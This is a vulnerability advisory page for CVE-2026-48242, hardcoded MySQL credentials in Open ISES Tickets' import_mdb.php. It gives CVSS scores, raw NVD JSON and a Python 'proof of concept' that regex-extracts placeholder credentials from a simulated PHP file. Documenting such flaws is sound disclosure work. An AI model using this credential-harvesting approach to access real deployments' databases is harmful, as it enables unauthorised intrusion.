Security Vulnerability Report
CVE-2026-48242 CVSS 8.1 HIGH

CVE-2026-48242

Published: 2026-05-21 18:16:21
Last Modified: 2026-05-21 19:10:12

Description

Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open ISES Tickets < 3.44.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
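# Proof of Concept for CVE-2026-48242
# This script demonstrates how to extract hardcoded credentials from the vulnerable file.
import re

# Simulating the content of the vulnerable import_mdb.php
VULNERABLE_FILE_CONTENT = """
<?php
$db_host = 'mysql.example.com';
$db_user = 'ises_admin';
$db_pass = 'S3cr3tP@ssw0rd!';
$db_name = 'ises_tickets_db';
// ... rest of the code
?>
"""

# Reported key -> PHP variable whose quoted string literal holds the value.
_CREDENTIAL_VARIABLES = {
    'host': 'db_host',
    'username': 'db_user',
    'password': 'db_pass',
    'database': 'db_name',
}

# One compiled pattern per variable, built once at import time.  Group 1
# captures the opening quote and the backreference \1 requires the literal to
# be closed by the *same* quote, so a value such as 'a"b' is captured whole
# instead of being cut at the first quote of either kind (the previous
# [\'"] closing class did that).  Backslash-escaped quotes inside the literal
# are not handled by this heuristic.
_CREDENTIAL_PATTERNS = {
    key: re.compile(r'\$' + var + r'\s*=\s*([\'"])(.*?)\1')
    for key, var in _CREDENTIAL_VARIABLES.items()
}


def extract_credentials(php_content):
    """Extract hardcoded MySQL credentials from PHP source code.

    This is a plain secret-scanning heuristic: it looks for the first quoted
    string literal assigned to each of ``$db_host``, ``$db_user``,
    ``$db_pass`` and ``$db_name``.

    Args:
        php_content: PHP source text to scan (a ``str``).

    Returns:
        dict mapping ``'host'``, ``'username'``, ``'password'`` and
        ``'database'`` to the matched literal's body.  A key whose variable
        is not assigned a quoted literal is omitted, so text with no such
        assignment (including ``""``) yields ``{}``.
    """
    credentials = {}
    for key, pattern in _CREDENTIAL_PATTERNS.items():
        match = pattern.search(php_content)
        if match:
            # Group 2 is the literal's body; group 1 is the quote character.
            credentials[key] = match.group(2)
    return credentials


if __name__ == "__main__":
    print("[+] Analyzing import_mdb.php for hardcoded credentials...")
    creds = extract_credentials(VULNERABLE_FILE_CONTENT)
    if creds:
        print("[!] Hardcoded credentials found:")
        for k, v in creds.items():
            print(f" {k}: {v}")
        print("\n[!] Attackers can now use these credentials to access the database directly.")
    else:
        print("[-] No credentials found.")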

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-48242", "sourceIdentifier": "[email protected]", "published": "2026-05-21T18:16:21.220", "lastModified": "2026-05-21T19:10:12.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff", "source": "[email protected]"}, {"url": "https://github.com/openises/tickets/releases/tag/v3.44.2", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-mysql-credentials-in-import-mdb-php", "source": "[email protected]"}]}}